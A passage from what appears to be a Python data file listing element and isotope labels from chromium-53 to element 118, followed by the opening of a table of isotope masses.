"CR53", "CR54", "CR55", "CR56", "CR57", "CR58", "CR59", "CR60", "CR61", "CR62",
"CR63", "CR64", "CR65", "CR66", "CR67", "MN", "MN44", "MN45", "MN46", "MN47",
"MN48", "MN49", "MN50", "MN51", "MN52", "MN53", "MN54", "MN55", "MN56", "MN57",
"MN58", "MN59", "MN60", "MN61", "MN62", "MN63", "MN64", "MN65", "MN66", "MN67",
"MN68", "MN69", "FE", "FE45", "FE46", "FE47", "FE48", "FE49", "FE50", "FE51",
"FE52", "FE53", "FE54", "FE55", "FE56", "FE57", "FE58", "FE59", "FE60", "FE61",
"FE62", "FE63", "FE64", "FE65", "FE66", "FE67", "FE68", "FE69", "FE70", "FE71",
"FE72", "CO", "CO47", "CO48", "CO49", "CO50", "CO51", "CO52", "CO53", "CO54",
"CO55", "CO56", "CO57", "CO58", "CO59", "CO60", "CO61", "CO62", "CO63", "CO64",
"CO65", "CO66", "CO67", "CO68", "CO69", "CO70", "CO71", "CO72", "CO73", "CO74",
"CO75", "NI", "NI48", "NI49", "NI50", "NI51", "NI52", "NI53", "NI54", "NI55",
"NI56", "NI57", "NI58", "NI59", "NI60", "NI61", "NI62", "NI63", "NI64", "NI65",
"NI66", "NI67", "NI68", "NI69", "NI70", "NI71", "NI72", "NI73", "NI74", "NI75",
"NI76", "NI77", "NI78", "CU", "CU52", "CU53", "CU54", "CU55", "CU56", "CU57",
"CU58", "CU59", "CU60", "CU61", "CU62", "CU63", "CU64", "CU65", "CU66", "CU67",
"CU68", "CU69", "CU70", "CU71", "CU72", "CU73", "CU74", "CU75", "CU76", "CU77",
"CU78", "CU79", "CU80", "ZN", "ZN54", "ZN55", "ZN56", "ZN57", "ZN58", "ZN59",
"ZN60", "ZN61", "ZN62", "ZN63", "ZN64", "ZN65", "ZN66", "ZN67", "ZN68", "ZN69",
"ZN70", "ZN71", "ZN72", "ZN73", "ZN74", "ZN75", "ZN76", "ZN77", "ZN78", "ZN79",
"ZN80", "ZN81", "ZN82", "ZN83", "GA", "GA56", "GA57", "GA58", "GA59", "GA60",
"GA61", "GA62", "GA63", "GA64", "GA65", "GA66", "GA67", "GA68", "GA69", "GA70",
"GA71", "GA72", "GA73", "GA74", "GA75", "GA76", "GA77", "GA78", "GA79", "GA80",
"GA81", "GA82", "GA83", "GA84", "GA85", "GA86", "GE", "GE58", "GE59", "GE60",
"GE61", "GE62", "GE63", "GE64", "GE65", "GE66", "GE67", "GE68", "GE69", "GE70",
"GE71", "GE72", "GE73", "GE74", "GE75", "GE76", "GE77", "GE78", "GE79", "GE80",
"GE81", "GE82", "GE83", "GE84", "GE85", "GE86", "GE87", "GE88", "GE89", "AS",
"AS60", "AS61", "AS62", "AS63", "AS64", "AS65", "AS66", "AS67", "AS68", "AS69",
"AS70", "AS71", "AS72", "AS73", "AS74", "AS75", "AS76", "AS77", "AS78", "AS79",
"AS80", "AS81", "AS82", "AS83", "AS84", "AS85", "AS86", "AS87", "AS88", "AS89",
"AS90", "AS91", "AS92", "SE", "SE65", "SE66", "SE67", "SE68", "SE69", "SE70",
"SE71", "SE72", "SE73", "SE74", "SE75", "SE76", "SE77", "SE78", "SE79", "SE80",
"SE81", "SE82", "SE83", "SE84", "SE85", "SE86", "SE87", "SE88", "SE89", "SE90",
"SE91", "SE92", "SE93", "SE94", "BR", "BR67", "BR68", "BR69", "BR70", "BR71",
"BR72", "BR73", "BR74", "BR75", "BR76", "BR77", "BR78", "BR79", "BR80", "BR81",
"BR82", "BR83", "BR84", "BR85", "BR86", "BR87", "BR88", "BR89", "BR90", "BR91",
"BR92", "BR93", "BR94", "BR95", "BR96", "BR97", "KR", "KR69", "KR70", "KR71",
"KR72", "KR73", "KR74", "KR75", "KR76", "KR77", "KR78", "KR79", "KR80", "KR81",
"KR82", "KR83", "KR84", "KR85", "KR86", "KR87", "KR88", "KR89", "KR90", "KR91",
"KR92", "KR93", "KR94", "KR95", "KR96", "KR97", "KR98", "KR99", "KR100", "RB",
"RB71", "RB72", "RB73", "RB74", "RB75", "RB76", "RB77", "RB78", "RB79", "RB80",
"RB81", "RB82", "RB83", "RB84", "RB85", "RB86", "RB87", "RB88", "RB89", "RB90",
"RB91", "RB92", "RB93", "RB94", "RB95", "RB96", "RB97", "RB98", "RB99",
"RB100", "RB101", "RB102", "SR", "SR73", "SR74", "SR75", "SR76", "SR77",
"SR78", "SR79", "SR80", "SR81", "SR82", "SR83", "SR84", "SR85", "SR86", "SR87",
"SR88", "SR89", "SR90", "SR91", "SR92", "SR93", "SR94", "SR95", "SR96", "SR97",
"SR98", "SR99", "SR100", "SR101", "SR102", "SR103", "SR104", "SR105", "Y",
"Y76", "Y77", "Y78", "Y79", "Y80", "Y81", "Y82", "Y83", "Y84", "Y85", "Y86",
"Y87", "Y88", "Y89", "Y90", "Y91", "Y92", "Y93", "Y94", "Y95", "Y96", "Y97",
"Y98", "Y99", "Y100", "Y101", "Y102", "Y103", "Y104", "Y105", "Y106", "Y107",
"Y108", "ZR", "ZR78", "ZR79", "ZR80", "ZR81", "ZR82", "ZR83", "ZR84", "ZR85",
"ZR86", "ZR87", "ZR88", "ZR89", "ZR90", "ZR91", "ZR92", "ZR93", "ZR94", "ZR95",
"ZR96", "ZR97", "ZR98", "ZR99", "ZR100", "ZR101", "ZR102", "ZR103", "ZR104",
"ZR105", "ZR106", "ZR107", "ZR108", "ZR109", "ZR110", "NB", "NB81", "NB82",
"NB83", "NB84", "NB85", "NB86", "NB87", "NB88", "NB89", "NB90", "NB91", "NB92",
"NB93", "NB94", "NB95", "NB96", "NB97", "NB98", "NB99", "NB100", "NB101",
"NB102", "NB103", "NB104", "NB105", "NB106", "NB107", "NB108", "NB109",
"NB110", "NB111", "NB112", "NB113", "MO", "MO83", "MO84", "MO85", "MO86",
"MO87", "MO88", "MO89", "MO90", "MO91", "MO92", "MO93", "MO94", "MO95", "MO96",
"MO97", "MO98", "MO99", "MO100", "MO101", "MO102", "MO103", "MO104", "MO105",
"MO106", "MO107", "MO108", "MO109", "MO110", "MO111", "MO112", "MO113",
"MO114", "MO115", "TC", "TC85", "TC86", "TC87", "TC88", "TC89", "TC90", "TC91",
"TC92", "TC93", "TC94", "TC95", "TC96", "TC97", "TC98", "TC99", "TC100",
"TC101", "TC102", "TC103", "TC104", "TC105", "TC106", "TC107", "TC108",
"TC109", "TC110", "TC111", "TC112", "TC113", "TC114", "TC115", "TC116",
"TC117", "TC118", "RU", "RU87", "RU88", "RU89", "RU90", "RU91", "RU92", "RU93",
"RU94", "RU95", "RU96", "RU97", "RU98", "RU99", "RU100", "RU101", "RU102",
"RU103", "RU104", "RU105", "RU106", "RU107", "RU108", "RU109", "RU110",
"RU111", "RU112", "RU113", "RU114", "RU115", "RU116", "RU117", "RU118",
"RU119", "RU120", "RH", "RH89", "RH90", "RH91", "RH92", "RH93", "RH94", "RH95",
"RH96", "RH97", "RH98", "RH99", "RH100", "RH101", "RH102", "RH103", "RH104",
"RH105", "RH106", "RH107", "RH108", "RH109", "RH110", "RH111", "RH112",
"RH113", "RH114", "RH115", "RH116", "RH117", "RH118", "RH119", "RH120",
"RH121", "RH122", "PD", "PD91", "PD92", "PD93", "PD94", "PD95", "PD96", "PD97",
"PD98", "PD99", "PD100", "PD101", "PD102", "PD103", "PD104", "PD105", "PD106",
"PD107", "PD108", "PD109", "PD110", "PD111", "PD112", "PD113", "PD114",
"PD115", "PD116", "PD117", "PD118", "PD119", "PD120", "PD121", "PD122",
"PD123", "PD124", "AG", "AG93", "AG94", "AG95", "AG96", "AG97", "AG98", "AG99",
"AG100", "AG101", "AG102", "AG103", "AG104", "AG105", "AG106", "AG107",
"AG108", "AG109", "AG110", "AG111", "AG112", "AG113", "AG114", "AG115",
"AG116", "AG117", "AG118", "AG119", "AG120", "AG121", "AG122", "AG123",
"AG124", "AG125", "AG126", "AG127", "AG128", "AG129", "AG130", "CD", "CD95",
"CD96", "CD97", "CD98", "CD99", "CD100", "CD101", "CD102", "CD103", "CD104",
"CD105", "CD106", "CD107", "CD108", "CD109", "CD110", "CD111", "CD112",
"CD113", "CD114", "CD115", "CD116", "CD117", "CD118", "CD119", "CD120",
"CD121", "CD122", "CD123", "CD124", "CD125", "CD126", "CD127", "CD128",
"CD129", "CD130", "CD131", "CD132", "IN", "IN97", "IN98", "IN99", "IN100",
"IN101", "IN102", "IN103", "IN104", "IN105", "IN106", "IN107", "IN108",
"IN109", "IN110", "IN111", "IN112", "IN113", "IN114", "IN115", "IN116",
"IN117", "IN118", "IN119", "IN120", "IN121", "IN122", "IN123", "IN124",
"IN125", "IN126", "IN127", "IN128", "IN129", "IN130", "IN131", "IN132",
"IN133", "IN134", "IN135", "SN", "SN99", "SN100", "SN101", "SN102", "SN103",
"SN104", "SN105", "SN106", "SN107", "SN108", "SN109", "SN110", "SN111",
"SN112", "SN113", "SN114", "SN115", "SN116", "SN117", "SN118", "SN119",
"SN120", "SN121", "SN122", "SN123", "SN124", "SN125", "SN126", "SN127",
"SN128", "SN129", "SN130", "SN131", "SN132", "SN133", "SN134", "SN135",
"SN136", "SN137", "SB", "SB103", "SB104", "SB105", "SB106", "SB107", "SB108",
"SB109", "SB110", "SB111", "SB112", "SB113", "SB114", "SB115", "SB116",
"SB117", "SB118", "SB119", "SB120", "SB121", "SB122", "SB123", "SB124",
"SB125", "SB126", "SB127", "SB128", "SB129", "SB130", "SB131", "SB132",
"SB133", "SB134", "SB135", "SB136", "SB137", "SB138", "SB139", "TE", "TE105",
"TE106", "TE107", "TE108", "TE109", "TE110", "TE111", "TE112", "TE113",
"TE114", "TE115", "TE116", "TE117", "TE118", "TE119", "TE120", "TE121",
"TE122", "TE123", "TE124", "TE125", "TE126", "TE127", "TE128", "TE129",
"TE130", "TE131", "TE132", "TE133", "TE134", "TE135", "TE136", "TE137",
"TE138", "TE139", "TE140", "TE141", "TE142", "I", "I108", "I109", "I110",
"I111", "I112", "I113", "I114", "I115", "I116", "I117", "I118", "I119", "I120",
"I121", "I122", "I123", "I124", "I125", "I126", "I127", "I128", "I129", "I130",
"I131", "I132", "I133", "I134", "I135", "I136", "I137", "I138", "I139", "I140",
"I141", "I142", "I143", "I144", "XE", "XE110", "XE111", "XE112", "XE113",
"XE114", "XE115", "XE116", "XE117", "XE118", "XE119", "XE120", "XE121",
"XE122", "XE123", "XE124", "XE125", "XE126", "XE127", "XE128", "XE129",
"XE130", "XE131", "XE132", "XE133", "XE134", "XE135", "XE136", "XE137",
"XE138", "XE139", "XE140", "XE141", "XE142", "XE143", "XE144", "XE145",
"XE146", "XE147", "CS", "CS112", "CS113", "CS114", "CS115", "CS116", "CS117",
"CS118", "CS119", "CS120", "CS121", "CS122", "CS123", "CS124", "CS125",
"CS126", "CS127", "CS128", "CS129", "CS130", "CS131", "CS132", "CS133",
"CS134", "CS135", "CS136", "CS137", "CS138", "CS139", "CS140", "CS141",
"CS142", "CS143", "CS144", "CS145", "CS146", "CS147", "CS148", "CS149",
"CS150", "CS151", "BA", "BA114", "BA115", "BA116", "BA117", "BA118", "BA119",
"BA120", "BA121", "BA122", "BA123", "BA124", "BA125", "BA126", "BA127",
"BA128", "BA129", "BA130", "BA131", "BA132", "BA133", "BA134", "BA135",
"BA136", "BA137", "BA138", "BA139", "BA140", "BA141", "BA142", "BA143",
"BA144", "BA145", "BA146", "BA147", "BA148", "BA149", "BA150", "BA151",
"BA152", "BA153", "LA", "LA117", "LA118", "LA119", "LA120", "LA121", "LA122",
"LA123", "LA124", "LA125", "LA126", "LA127", "LA128", "LA129", "LA130",
"LA131", "LA132", "LA133", "LA134", "LA135", "LA136", "LA137", "LA138",
"LA139", "LA140", "LA141", "LA142", "LA143", "LA144", "LA145", "LA146",
"LA147", "LA148", "LA149", "LA150", "LA151", "LA152", "LA153", "LA154",
"LA155", "CE", "CE119", "CE120", "CE121", "CE122", "CE123", "CE124", "CE125",
"CE126", "CE127", "CE128", "CE129", "CE130", "CE131", "CE132", "CE133",
"CE134", "CE135", "CE136", "CE137", "CE138", "CE139", "CE140", "CE141",
"CE142", "CE143", "CE144", "CE145", "CE146", "CE147", "CE148", "CE149",
"CE150", "CE151", "CE152", "CE153", "CE154", "CE155", "CE156", "CE157", "PR",
"PR121", "PR122", "PR123", "PR124", "PR125", "PR126", "PR127", "PR128",
"PR129", "PR130", "PR131", "PR132", "PR133", "PR134", "PR135", "PR136",
"PR137", "PR138", "PR139", "PR140", "PR141", "PR142", "PR143", "PR144",
"PR145", "PR146", "PR147", "PR148", "PR149", "PR150", "PR151", "PR152",
"PR153", "PR154", "PR155", "PR156", "PR157", "PR158", "PR159", "ND", "ND124",
"ND125", "ND126", "ND127", "ND128", "ND129", "ND130", "ND131", "ND132",
"ND133", "ND134", "ND135", "ND136", "ND137", "ND138", "ND139", "ND140",
"ND141", "ND142", "ND143", "ND144", "ND145", "ND146", "ND147", "ND148",
"ND149", "ND150", "ND151", "ND152", "ND153", "ND154", "ND155", "ND156",
"ND157", "ND158", "ND159", "ND160", "ND161", "PM", "PM126", "PM127", "PM128",
"PM129", "PM130", "PM131", "PM132", "PM133", "PM134", "PM135", "PM136",
"PM137", "PM138", "PM139", "PM140", "PM141", "PM142", "PM143", "PM144",
"PM145", "PM146", "PM147", "PM148", "PM149", "PM150", "PM151", "PM152",
"PM153", "PM154", "PM155", "PM156", "PM157", "PM158", "PM159", "PM160",
"PM161", "PM162", "PM163", "SM", "SM128", "SM129", "SM130", "SM131", "SM132",
"SM133", "SM134", "SM135", "SM136", "SM137", "SM138", "SM139", "SM140",
"SM141", "SM142", "SM143", "SM144", "SM145", "SM146", "SM147", "SM148",
"SM149", "SM150", "SM151", "SM152", "SM153", "SM154", "SM155", "SM156",
"SM157", "SM158", "SM159", "SM160", "SM161", "SM162", "SM163", "SM164",
"SM165", "EU", "EU130", "EU131", "EU132", "EU133", "EU134", "EU135", "EU136",
"EU137", "EU138", "EU139", "EU140", "EU141", "EU142", "EU143", "EU144",
"EU145", "EU146", "EU147", "EU148", "EU149", "EU150", "EU151", "EU152",
"EU153", "EU154", "EU155", "EU156", "EU157", "EU158", "EU159", "EU160",
"EU161", "EU162", "EU163", "EU164", "EU165", "EU166", "EU167", "GD", "GD134",
"GD135", "GD136", "GD137", "GD138", "GD139", "GD140", "GD141", "GD142",
"GD143", "GD144", "GD145", "GD146", "GD147", "GD148", "GD149", "GD150",
"GD151", "GD152", "GD153", "GD154", "GD155", "GD156", "GD157", "GD158",
"GD159", "GD160", "GD161", "GD162", "GD163", "GD164", "GD165", "GD166",
"GD167", "GD168", "GD169", "TB", "TB136", "TB137", "TB138", "TB139", "TB140",
"TB141", "TB142", "TB143", "TB144", "TB145", "TB146", "TB147", "TB148",
"TB149", "TB150", "TB151", "TB152", "TB153", "TB154", "TB155", "TB156",
"TB157", "TB158", "TB159", "TB160", "TB161", "TB162", "TB163", "TB164",
"TB165", "TB166", "TB167", "TB168", "TB169", "TB170", "TB171", "DY", "DY138",
"DY139", "DY140", "DY141", "DY142", "DY143", "DY144", "DY145", "DY146",
"DY147", "DY148", "DY149", "DY150", "DY151", "DY152", "DY153", "DY154",
"DY155", "DY156", "DY157", "DY158", "DY159", "DY160", "DY161", "DY162",
"DY163", "DY164", "DY165", "DY166", "DY167", "DY168", "DY169", "DY170",
"DY171", "DY172", "DY173", "HO", "HO140", "HO141", "HO142", "HO143", "HO144",
"HO145", "HO146", "HO147", "HO148", "HO149", "HO150", "HO151", "HO152",
"HO153", "HO154", "HO155", "HO156", "HO157", "HO158", "HO159", "HO160",
"HO161", "HO162", "HO163", "HO164", "HO165", "HO166", "HO167", "HO168",
"HO169", "HO170", "HO171", "HO172", "HO173", "HO174", "HO175", "ER", "ER143",
"ER144", "ER145", "ER146", "ER147", "ER148", "ER149", "ER150", "ER151",
"ER152", "ER153", "ER154", "ER155", "ER156", "ER157", "ER158", "ER159",
"ER160", "ER161", "ER162", "ER163", "ER164", "ER165", "ER166", "ER167",
"ER168", "ER169", "ER170", "ER171", "ER172", "ER173", "ER174", "ER175",
"ER176", "ER177", "TM", "TM145", "TM146", "TM147", "TM148", "TM149", "TM150",
"TM151", "TM152", "TM153", "TM154", "TM155", "TM156", "TM157", "TM158",
"TM159", "TM160", "TM161", "TM162", "TM163", "TM164", "TM165", "TM166",
"TM167", "TM168", "TM169", "TM170", "TM171", "TM172", "TM173", "TM174",
"TM175", "TM176", "TM177", "TM178", "TM179", "YB", "YB148", "YB149", "YB150",
"YB151", "YB152", "YB153", "YB154", "YB155", "YB156", "YB157", "YB158",
"YB159", "YB160", "YB161", "YB162", "YB163", "YB164", "YB165", "YB166",
"YB167", "YB168", "YB169", "YB170", "YB171", "YB172", "YB173", "YB174",
"YB175", "YB176", "YB177", "YB178", "YB179", "YB180", "YB181", "LU", "LU150",
"LU151", "LU152", "LU153", "LU154", "LU155", "LU156", "LU157", "LU158",
"LU159", "LU160", "LU161", "LU162", "LU163", "LU164", "LU165", "LU166",
"LU167", "LU168", "LU169", "LU170", "LU171", "LU172", "LU173", "LU174",
"LU175", "LU176", "LU177", "LU178", "LU179", "LU180", "LU181", "LU182",
"LU183", "LU184", "HF", "HF153", "HF154", "HF155", "HF156", "HF157", "HF158",
"HF159", "HF160", "HF161", "HF162", "HF163", "HF164", "HF165", "HF166",
"HF167", "HF168", "HF169", "HF170", "HF171", "HF172", "HF173", "HF174",
"HF175", "HF176", "HF177", "HF178", "HF179", "HF180", "HF181", "HF182",
"HF183", "HF184", "HF185", "HF186", "HF187", "HF188", "TA", "TA155", "TA156",
"TA157", "TA158", "TA159", "TA160", "TA161", "TA162", "TA163", "TA164",
"TA165", "TA166", "TA167", "TA168", "TA169", "TA170", "TA171", "TA172",
"TA173", "TA174", "TA175", "TA176", "TA177", "TA178", "TA179", "TA180",
"TA181", "TA182", "TA183", "TA184", "TA185", "TA186", "TA187", "TA188",
"TA189", "TA190", "W", "W158", "W159", "W160", "W161", "W162", "W163", "W164",
"W165", "W166", "W167", "W168", "W169", "W170", "W171", "W172", "W173", "W174",
"W175", "W176", "W177", "W178", "W179", "W180", "W181", "W182", "W183", "W184",
"W185", "W186", "W187", "W188", "W189", "W190", "W191", "W192", "RE", "RE160",
"RE161", "RE162", "RE163", "RE164", "RE165", "RE166", "RE167", "RE168",
"RE169", "RE170", "RE171", "RE172", "RE173", "RE174", "RE175", "RE176",
"RE177", "RE178", "RE179", "RE180", "RE181", "RE182", "RE183", "RE184",
"RE185", "RE186", "RE187", "RE188", "RE189", "RE190", "RE191", "RE192",
"RE193", "RE194", "OS", "OS162", "OS163", "OS164", "OS165", "OS166", "OS167",
"OS168", "OS169", "OS170", "OS171", "OS172", "OS173", "OS174", "OS175",
"OS176", "OS177", "OS178", "OS179", "OS180", "OS181", "OS182", "OS183",
"OS184", "OS185", "OS186", "OS187", "OS188", "OS189", "OS190", "OS191",
"OS192", "OS193", "OS194", "OS195", "OS196", "IR", "IR164", "IR165", "IR166",
"IR167", "IR168", "IR169", "IR170", "IR171", "IR172", "IR173", "IR174",
"IR175", "IR176", "IR177", "IR178", "IR179", "IR180", "IR181", "IR182",
"IR183", "IR184", "IR185", "IR186", "IR187", "IR188", "IR189", "IR190",
"IR191", "IR192", "IR193", "IR194", "IR195", "IR196", "IR197", "IR198",
"IR199", "PT", "PT166", "PT167", "PT168", "PT169", "PT170", "PT171", "PT172",
"PT173", "PT174", "PT175", "PT176", "PT177", "PT178", "PT179", "PT180",
"PT181", "PT182", "PT183", "PT184", "PT185", "PT186", "PT187", "PT188",
"PT189", "PT190", "PT191", "PT192", "PT193", "PT194", "PT195", "PT196",
"PT197", "PT198", "PT199", "PT200", "PT201", "PT202", "AU", "AU169", "AU170",
"AU171", "AU172", "AU173", "AU174", "AU175", "AU176", "AU177", "AU178",
"AU179", "AU180", "AU181", "AU182", "AU183", "AU184", "AU185", "AU186",
"AU187", "AU188", "AU189", "AU190", "AU191", "AU192", "AU193", "AU194",
"AU195", "AU196", "AU197", "AU198", "AU199", "AU200", "AU201", "AU202",
"AU203", "AU204", "AU205", "HG", "HG171", "HG172", "HG173", "HG174", "HG175",
"HG176", "HG177", "HG178", "HG179", "HG180", "HG181", "HG182", "HG183",
"HG184", "HG185", "HG186", "HG187", "HG188", "HG189", "HG190", "HG191",
"HG192", "HG193", "HG194", "HG195", "HG196", "HG197", "HG198", "HG199",
"HG200", "HG201", "HG202", "HG203", "HG204", "HG205", "HG206", "HG207",
"HG208", "HG209", "HG210", "TL", "TL176", "TL177", "TL178", "TL179", "TL180",
"TL181", "TL182", "TL183", "TL184", "TL185", "TL186", "TL187", "TL188",
"TL189", "TL190", "TL191", "TL192", "TL193", "TL194", "TL195", "TL196",
"TL197", "TL198", "TL199", "TL200", "TL201", "TL202", "TL203", "TL204",
"TL205", "TL206", "TL207", "TL208", "TL209", "TL210", "TL211", "TL212", "PB",
"PB178", "PB179", "PB180", "PB181", "PB182", "PB183", "PB184", "PB185",
"PB186", "PB187", "PB188", "PB189", "PB190", "PB191", "PB192", "PB193",
"PB194", "PB195", "PB196", "PB197", "PB198", "PB199", "PB200", "PB201",
"PB202", "PB203", "PB204", "PB205", "PB206", "PB207", "PB208", "PB209",
"PB210", "PB211", "PB212", "PB213", "PB214", "PB215", "BI", "BI184", "BI185",
"BI186", "BI187", "BI188", "BI189", "BI190", "BI191", "BI192", "BI193",
"BI194", "BI195", "BI196", "BI197", "BI198", "BI199", "BI200", "BI201",
"BI202", "BI203", "BI204", "BI205", "BI206", "BI207", "BI208", "BI209",
"BI210", "BI211", "BI212", "BI213", "BI214", "BI215", "BI216", "BI217",
"BI218", "PO", "PO188", "PO189", "PO190", "PO191", "PO192", "PO193", "PO194",
"PO195", "PO196", "PO197", "PO198", "PO199", "PO200", "PO201", "PO202",
"PO203", "PO204", "PO205", "PO206", "PO207", "PO208", "PO209", "PO210",
"PO211", "PO212", "PO213", "PO214", "PO215", "PO216", "PO217", "PO218",
"PO219", "PO220", "AT", "AT193", "AT194", "AT195", "AT196", "AT197", "AT198",
"AT199", "AT200", "AT201", "AT202", "AT203", "AT204", "AT205", "AT206",
"AT207", "AT208", "AT209", "AT210", "AT211", "AT212", "AT213", "AT214",
"AT215", "AT216", "AT217", "AT218", "AT219", "AT220", "AT221", "AT222",
"AT223", "RN", "RN195", "RN196", "RN197", "RN198", "RN199", "RN200", "RN201",
"RN202", "RN203", "RN204", "RN205", "RN206", "RN207", "RN208", "RN209",
"RN210", "RN211", "RN212", "RN213", "RN214", "RN215", "RN216", "RN217",
"RN218", "RN219", "RN220", "RN221", "RN222", "RN223", "RN224", "RN225",
"RN226", "RN227", "RN228", "FR", "FR199", "FR200", "FR201", "FR202", "FR203",
"FR204", "FR205", "FR206", "FR207", "FR208", "FR209", "FR210", "FR211",
"FR212", "FR213", "FR214", "FR215", "FR216", "FR217", "FR218", "FR219",
"FR220", "FR221", "FR222", "FR223", "FR224", "FR225", "FR226", "FR227",
"FR228", "FR229", "FR230", "FR231", "FR232", "RA", "RA202", "RA203", "RA204",
"RA205", "RA206", "RA207", "RA208", "RA209", "RA210", "RA211", "RA212",
"RA213", "RA214", "RA215", "RA216", "RA217", "RA218", "RA219", "RA220",
"RA221", "RA222", "RA223", "RA224", "RA225", "RA226", "RA227", "RA228",
"RA229", "RA230", "RA231", "RA232", "RA233", "RA234", "AC", "AC206", "AC207",
"AC208", "AC209", "AC210", "AC211", "AC212", "AC213", "AC214", "AC215",
"AC216", "AC217", "AC218", "AC219", "AC220", "AC221", "AC222", "AC223",
"AC224", "AC225", "AC226", "AC227", "AC228", "AC229", "AC230", "AC231",
"AC232", "AC233", "AC234", "AC235", "AC236", "TH", "TH209", "TH210", "TH211",
"TH212", "TH213", "TH214", "TH215", "TH216", "TH217", "TH218", "TH219",
"TH220", "TH221", "TH222", "TH223", "TH224", "TH225", "TH226", "TH227",
"TH228", "TH229", "TH230", "TH231", "TH232", "TH233", "TH234", "TH235",
"TH236", "TH237", "TH238", "PA", "PA212", "PA213", "PA214", "PA215", "PA216",
"PA217", "PA218", "PA219", "PA220", "PA221", "PA222", "PA223", "PA224",
"PA225", "PA226", "PA227", "PA228", "PA229", "PA230", "PA231", "PA232",
"PA233", "PA234", "PA235", "PA236", "PA237", "PA238", "PA239", "PA240", "U",
"U217", "U218", "U219", "U220", "U221", "U222", "U223", "U224", "U225", "U226",
"U227", "U228", "U229", "U230", "U231", "U232", "U233", "U234", "U235", "U236",
"U237", "U238", "U239", "U240", "U241", "U242", "NP", "NP225", "NP226",
"NP227", "NP228", "NP229", "NP230", "NP231", "NP232", "NP233", "NP234",
"NP235", "NP236", "NP237", "NP238", "NP239", "NP240", "NP241", "NP242",
"NP243", "NP244", "PU", "PU228", "PU229", "PU230", "PU231", "PU232", "PU233",
"PU234", "PU235", "PU236", "PU237", "PU238", "PU239", "PU240", "PU241",
"PU242", "PU243", "PU244", "PU245", "PU246", "PU247", "AM", "AM231", "AM232",
"AM233", "AM234", "AM235", "AM236", "AM237", "AM238", "AM239", "AM240",
"AM241", "AM242", "AM243", "AM244", "AM245", "AM246", "AM247", "AM248",
"AM249", "CM", "CM233", "CM234", "CM235", "CM236", "CM237", "CM238", "CM239",
"CM240", "CM241", "CM242", "CM243", "CM244", "CM245", "CM246", "CM247",
"CM248", "CM249", "CM250", "CM251", "CM252", "BK", "BK235", "BK236", "BK237",
"BK238", "BK239", "BK240", "BK241", "BK242", "BK243", "BK244", "BK245",
"BK246", "BK247", "BK248", "BK249", "BK250", "BK251", "BK252", "BK253",
"BK254", "CF", "CF237", "CF238", "CF239", "CF240", "CF241", "CF242", "CF243",
"CF244", "CF245", "CF246", "CF247", "CF248", "CF249", "CF250", "CF251",
"CF252", "CF253", "CF254", "CF255", "CF256", "ES", "ES240", "ES241", "ES242",
"ES243", "ES244", "ES245", "ES246", "ES247", "ES248", "ES249", "ES250",
"ES251", "ES252", "ES253", "ES254", "ES255", "ES256", "ES257", "ES258", "FM",
"FM242", "FM243", "FM244", "FM245", "FM246", "FM247", "FM248", "FM249",
"FM250", "FM251", "FM252", "FM253", "FM254", "FM255", "FM256", "FM257",
"FM258", "FM259", "FM260", "MD", "MD245", "MD246", "MD247", "MD248", "MD249",
"MD250", "MD251", "MD252", "MD253", "MD254", "MD255", "MD256", "MD257",
"MD258", "MD259", "MD260", "MD261", "MD262", "NO", "NO248", "NO249", "NO250",
"NO251", "NO252", "NO253", "NO254", "NO255", "NO256", "NO257", "NO258",
"NO259", "NO260", "NO261", "NO262", "NO263", "NO264", "LR", "LR251", "LR252",
"LR253", "LR254", "LR255", "LR256", "LR257", "LR258", "LR259", "LR260",
"LR261", "LR262", "LR263", "LR264", "LR265", "LR266", "RF", "RF253", "RF254",
"RF255", "RF256", "RF257", "RF258", "RF259", "RF260", "RF261", "RF262",
"RF263", "RF264", "RF265", "RF266", "RF267", "RF268", "DB", "DB255", "DB256",
"DB257", "DB258", "DB259", "DB260", "DB261", "DB262", "DB263", "DB264",
"DB265", "DB266", "DB267", "DB268", "DB269", "DB270", "SG", "SG258", "SG259",
"SG260", "SG261", "SG262", "SG263", "SG264", "SG265", "SG266", "SG267",
"SG268", "SG269", "SG270", "SG271", "SG272", "SG273", "BH", "BH260", "BH261",
"BH262", "BH263", "BH264", "BH265", "BH266", "BH267", "BH268", "BH269",
"BH270", "BH271", "BH272", "BH273", "BH274", "BH275", "HS", "HS263", "HS264",
"HS265", "HS266", "HS267", "HS268", "HS269", "HS270", "HS271", "HS272",
"HS273", "HS274", "HS275", "HS276", "HS277", "MT", "MT265", "MT266", "MT267",
"MT268", "MT269", "MT270", "MT271", "MT272", "MT273", "MT274", "MT275",
"MT276", "MT277", "MT278", "MT279", "DS", "DS267", "DS268", "DS269", "DS270",
"DS271", "DS272", "DS273", "DS274", "DS275", "DS276", "DS277", "DS278",
"DS279", "DS280", "DS281", "RG", "RG272", "RG273", "RG274", "RG275", "RG276",
"RG277", "RG278", "RG279", "RG280", "RG281", "RG282", "RG283", "UUB",
"UUB277", "UUB278", "UUB279", "UUB280", "UUB281", "UUB282", "UUB283",
"UUB284", "UUB285", "UUT", "UUT283", "UUT284", "UUT285", "UUT286", "UUT287",
"UUQ", "UUQ285", "UUQ286", "UUQ287", "UUQ288", "UUQ289", "UUP", "UUP287",
"UUP288", "UUP289", "UUP290", "UUP291", "UUH", "UUH289", "UUH290", "UUH291",
"UUH292", "UUS", "UUS291", "UUS292", "UUO", "UUO293"]
_temp_iso_mass = [
1.00782503207, 1.00782503207, 2.01410177785, 2.01410177785, 3.01604927767,
3.01604927767, 4.027806424, 5.035311488, 6.044942594, 7.052749,
4.00260325415, 3.01602931914, 4.00260325415, 5.012223624, 6.018889124,
7.028020618, 8.033921897, 9.043950286, 10.052398837, 7.016004548, 3.030775,
4.027185558, 5.0125378, 6.015122794, 7.016004548, 8.022487362, 9.026789505,
10.035481259, 11.043797715, 12.053780, 9.012182201, 5.040790, 6.019726317,
7.016929828, 8.005305103, 9.012182201, 10.013533818, 11.021657749,
12.026920737, 13.035693007, 14.04289292, 15.053460, 16.061920, 11.009305406,
6.046810, 7.029917901, 8.024607233, 9.013328782, 10.012936992, 11.009305406,
12.014352104, 13.017780217, 14.025404009, 15.031103021, 16.039808829,
17.046989906, 18.056170, 19.063730, 12, 8.037675025, 9.031036689,
10.016853228, 11.011433613, 12, 13.00335483778, 14.0032419887, 15.010599256,
16.014701252, 17.022586116, 18.026759354, 19.034805018, 20.040319754,
21.049340, 22.057200, 14.00307400478, 10.041653674, 11.026090956,
12.018613197, 13.005738609, 14.00307400478, 15.00010889823, 16.006101658,
17.008450261, 18.014078959, 19.017028697, 20.023365807, 21.02710824,
22.034394934, 23.041220, 24.051040, 25.060660, 15.99491461956,
